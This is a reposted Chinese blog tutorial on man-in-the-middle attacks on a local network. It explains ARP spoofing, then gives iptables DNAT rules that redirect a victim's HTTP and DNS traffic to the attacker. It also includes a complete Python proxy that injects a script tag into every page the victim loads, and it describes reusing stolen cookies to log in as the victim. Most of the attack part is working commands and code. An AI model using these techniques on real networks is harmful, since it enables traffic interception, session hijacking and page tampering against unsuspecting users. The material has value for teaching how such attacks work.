局域网下的html注入及DNS劫持

最新推荐文章于 2021-06-21 17:35:59 发布
最新推荐文章于 2021-06-21 17:35:59 发布
阅读量228 收藏
点赞数
文章标签: 运维 网络
原文链接:http://www.cnblogs.com/sky-star/p/htmlinject.html
版权

之前研究Dsploit的部分功能实现原理,现在了解的差不多了,简要记录下Dsploit的断网攻击,html注入,图片替换,cookie劫持的原理。本篇blog需要有一定的网络知识基础在看。

假设现有三台主机,A代表网关,B代表攻击者,C代表受害者。A,B,C的ip分别为192.168.1.1       192.168.1.2       192.168.1.3

B使用Nmap扫描当前网段下的主机,发现了网关A,联网主机C。

断网原理:B如果想让C断网,只需要用arpspoof不断发arp reply包将自己伪装为网关A,即发送的arp reply包中ip为网关的ip192.168.1.1,但是arp reply中的mac却是自己的,这样C主机会将数据发送给攻击者B,如果攻击者B没有设置ip转发,那么主机C就会断网。

html注入,图片替换,cookie劫持原理:

在上述的断网原理下,如果攻击者B开启了ip转发功能,用iptables工具输入 iptables -t nat -s 192.168.1.3 -p tcp --dport 80 -j DNAT --to 192.168.1.2:8080

将主机C发送的目的端口是80的tcp报文转发到本机监听的端口8080上(注:这里8080只是举例用,不一定非要8080,只要是http代理监听的端口就行

然后主机B在本机上运行http代理程序,http代理根据主机C发的http头可知主机C要连接的网站是哪个网站,根据网址将http请求转发,再将网站的响应转发给主机C,这样主机C还不知道自己的数据已经被窃听到了。

html注入发生在攻击者B将网站的响应转发给主机C的过程中,若http代理发现该响应可以注入html代码,就将html代码注入到响应后,再将注入后的响应发送给主机C,cookie劫持,图片替换发生在攻击者B转发主机C的http请求时,http代理将主机C发送的http请求中的cookie记录下来,就可利用主机C的cookie来进行登录服务。若http代理发现http头请求的文件类型为图片,则直接转发自己定义的图片给主机C。

DNS劫持原理与html注入类似,iptables -t nat -p udp --dport 53 -j DNAT --to 192.168.1.2:3000将DNS请求转发给本机的DNS代理,根据DNS报文的内容决定要不要伪造DNS响应。

下面给一个简单的http代理程序源码,本http代理会在响应中注入<script>alert("you have been hacked.")</script>

#!/
# coding = utf-8
import socket
import threading
import re





class HttpHeaderParser(object):
     def __init__(self, arg):
         super(HttpHeaderParser, self).__init__()
         self.arg = arg
         self._parse();
     def _parse(self):
         try:
             #print 'raw data:\n' + self.arg;
             data = self.arg[self.arg.find('\r'):self.arg.find('\n\r\n')]
             self.name = re.findall('\n(.*?):',data);
             self.value = re.findall(':(.*?)\r',data);
             self.body = self.arg[self.arg.find('\r\n\r\n') + 4:];
             self.status = self.arg[0:self.arg.find('\r\n')];
             for i in range(0,len(self.value)):
                 self.value[i] = self.value[i].lstrip();#过滤不必要的空格
             self._getHostAddr();
         except:
             print 'error';
         #print self.arg;
     def getAttribute(self,name):
         if name in self.name:
             return self.value[self.name.index(name)];
         return None;
     def setAttribute(self,name,value):
         if name in self.name:
             self.value[self.name.index(name)] = value;
             return ;
         self.name.append(name);
         self.value.append(value);

     def _getHostAddr(self):
         self.host = self.getAttribute('Host');
         self.port = 80;
         if ':' in self.host:
             tmp = self.host;
             self.host = tmp[0:tmp.find(':')];
             self.host = socket.gethostbyname(self.host);
             self.port = int(tmp[tmp.find(':') + 1:])
     def getAddr(self):
         return (self.host,self.port);


     def buildHeader(self):
         tmp = self.status + '\r\n';
         for i in range(0,len(self.name)):
             tmp = tmp + self.name[i] + ':' + self.value[i] + '\r\n';
         tmp = tmp + '\r\n' + self.body;
         #print 'build:\n' + tmp;
         return tmp;







def proc(client):
    data = client.recv(2048);
    #print data;
    if data:
        parser = HttpHeaderParser(data);
        addr = parser.getAddr();
        if addr[0] == '192.168.155.1':
            addr = (socket.gethostbyname('123.207.127.183'),80);
            parser.setAttribute('Host','123.207.127.183')
        parser.setAttribute('Accept-Encoding','');
        head = parser.buildHeader();
        sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM);
        sock.connect(addr);
        sock.sendall(head);
        html = sock.recv(2048);
        while html:
            html = html.replace('<body>','<body><script>alert(\"you have been hacked.\")</script>');
            print html;
            client.sendall(html);
            html = sock.recv(1024);
        sock.close();

    client.close();



def main():
    addr = ('0.0.0.0',3000);
    sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM);
    sock.bind(addr);
    sock.listen(80);
    b = True;
    while b:
        client,clientaddr = sock.accept();
        t = threading.Thread(target = proc,args =(client,));
        t.start();
        #t.join();
    sock.close();
    print 'finish!!!';


if __name__ == '__main__':
    main()

 在本机设置为http代理运行之后,打开网页

会先出现

然后才是网站的真正响应。

ps:如有错误,欢迎指正。

转载于:https://www.cnblogs.com/sky-star/p/htmlinject.html

weixin_30555125
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
通过注入的恶意代码获取网站权限
pray for the future
07-30 775
<br />一、查找本地漏洞  <br /><br />找到一个可能存在本地包含的文件去check它。  <br />例如:     www.website.com/view.php?page=contact.php  <br />替换成   www.website.com/view.php?page=../   <br />我们得到一个错误  <br />Warning: include(../) [function.include]: failed to open stream: No such fil
Windows 平台下局域网劫持测试工具 – EvilFoca
10-24
EvilFoca是Windows环境下基于.NET FrameWork的一款轻量级的劫持测试工具。与BackTrack和Kali_Linux下复杂的命令相比,EvilFoca更加小巧,轻便,简单,但其效果更加显著高效。
局域网渗透的一些小工具(支持win7)
10-31
一些内网的,命令行格式的工具,可以来看看,很简单
ARP欺骗病毒,网页“篡改”,注入iframe代码!
weixin_34123613的博客
08-29 181
---------------权威资料看这里---------------清华大学信息网络工程研究中心-中国教育和科研计算机网应急响应组《ARP 欺骗网页劫持攻击分析》PDF文件,直接IE打开或者另存为查看http://202.203.128.31/manage/upload/attach/11975323420.pdf---------------民间资料看这里---------------网 ...
windows局域网的一个经典的入侵方法
11-22
然后在cmd底下输入 telnet 对方ip地址 就会显示对方的一个cmdshell了,当然这里有个小技巧,如果你不知道对方ip怎么办。很简单cmd下输入net view 可以查看到局域网计算机名..................
因ARP欺骗网站源文件被注入了代码http://www.cnbruce.com/blog/showlog.asp?cat_id=32&log_id=1191
专栏
07-24 2036
最近我的网站突然出现访问的迟钝,并且打开之后杀毒软件立即提示含有木马病毒。我就很纳闷,运行了4年的网站一直都好好的最近怎么出现病毒提示呢。职业习惯原因打开了网站的源代码查看,原来在网页源代码的头部被加入了嵌套框架网页,该网页执行木马程序……按照常理我心中一寒:估计是服务器被人攻陷了,所有文件代码被加了此行代码,于是FTP上去,下载文件下来查看却没有该代码。于是询问服务器管理员含笑,他一听就说:“是
Linux下qt实现局域网聊天qq
09-08
Linux下qt实现局域网聊天qq
2021年局域网DNS劫持实战.docx
11-17
2021年局域网DNS劫持实战.docx
局域网中如何使用DNS建域
05-20
局域网环境中,使用DNS(Domain Name System)建立域名系统是提高网络管理效率和便捷性的关键步骤。DNS主要负责将易于记忆的域名转换为计算机可识别的IP地址,这样在网络中的设备就可以通过域名互相访问,而无需...
局域网dns冲突.doc
07-04
局域网DNS冲突是指在同一个网络环境中,多台设备在使用DNS服务时出现的问题,可能导致网络访问异常,比如无法正常访问特定网站或者整个互联网服务受阻。DNS(Domain Name System)是互联网上的一种核心服务,它负责...
html5点击,点击劫持ClickJacking+HTML5
weixin_35983438的博客
06-21 234
学习笔记而已 ~~~~~~~~~~~~~~~~~~~~~~~~~~点击劫持是一种视觉上的欺骗手段,攻击者使用一个透明的,不可见的iframe 覆盖在一个网页上,然后诱使用户在该页面点击透明的iframe 网页,通过调整iframe页面的位置,可以诱使用户恰好点击在iframe页面的一些功能性按钮上例子:Clickyou can you up!flash 点击劫持,图片覆盖攻击 XSIO 还有...
[详解]一行代码解决iframe挂马(包含服务器端注入、客户端ARP注入等)
努力学习ASP.NET
06-01 763
   相信大多数朋友都是iframe木马的受害者,有朋友的网站被注入了n回iframe,心情可想而知。而且现在ARP攻击,注入iframe也是轻而易举的事,仅局域网里都时刻面临威胁,哎,什么世道。接近年关,为了防止更多的朋友受到攻击,于是细细说下。    灵儿曾经在经典论坛上发过贴子:《一行代码解决网站防挂IFRAME木马方案》http://bbs.blueidea.com/thread-27
【HTTP劫持DNS劫持】腾讯的实际业务分析
weixin_34007291的博客
10-29 1262
    简单介绍一下HTTP劫持DNS劫持的概念,也就是运营商通过某些方式篡改了用户正常访问的网页,插入广告或者其他一些杂七杂八的东西。       首先对运营商的劫持行为做一些分析,他们的目的无非就是赚钱,而赚钱的方式有两种:     1、对正常网站加入额外的广告,这包括网页内浮层或弹出广告窗口;     2、针对一些广告联盟或带推广链接的网站,加入推广尾巴。例如普通访问百度首页,被前...
如何实现网页防篡改
mmoooodd的专栏
12-03 5916
最近想和朋友搞一个防篡改的东西,我自己罗列了一些,咨询下各位篡改网页的途径和相应的方法,小弟不才,不胜赐教. 一、网页篡改的途径 (1)SQL注入后获取Webshell: 黑客通过web应用程序的漏洞,通过SQL语句提交非法的语句到数据,通过系统以及第三方软件的漏洞获取web的控制权限或者服务器权限; (2)XSS漏洞引入恶意HTML界面: 被动的跨站攻击可以在合法的地方引入非法的HTM
HTML5页面被运营商进行DNS劫持问题及解决方案,app中h5页面源码的获取
ZHIYUANfL的博客
09-18 3304
App应用的html5页面经过运营商的移动网络(非wifi网络),被强制插入广告和手机管家的多余信息,在有些场景严重干扰用户的操作,也产生在美丽的页面上加入了不协调的悬浮层。并且这个手机管家类的悬浮层有时间出现,有时间不出现,神出鬼没,虽然你可以通过点击关闭手机手机关键是突然出现,有时候还关闭不了。总之用户不喜欢这种用户不需要的选择,所以干掉它吧!  在app中h5页面源码,可以通过下面代码获得
Web Hacking 101 中文版 五、HTML 注入
热门推荐
龙哥盟
03-17 4万+
五、HTML 注入 作者:Peter Yaworski 译者:飞龙 协议:CC BY-NC-SA 4.0 描述超文本标记语言(HTML注入有时也被称为虚拟污染。 这实际上是一个由站点造成的攻击,该站点允许恶意用户向其 Web 页面注入 HTML,并且没有合理处理用户输入。 换句话说,HTML 注入漏洞是由接收 HTML 引起的,通常通过一些之后会呈现在页面的表单输入。 这个
不同一局域网下访问HTML
最新发布
05-31
如果你想在不同的计算机上访问同一个 HTML 页面,但这些计算机都在同一个局域网中,那么你可以使用该局域网的 IP 地址来访问该页面。首先,你需要将该页面托管在一个局域网中的计算机上,并启动该计算机上的 Web ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值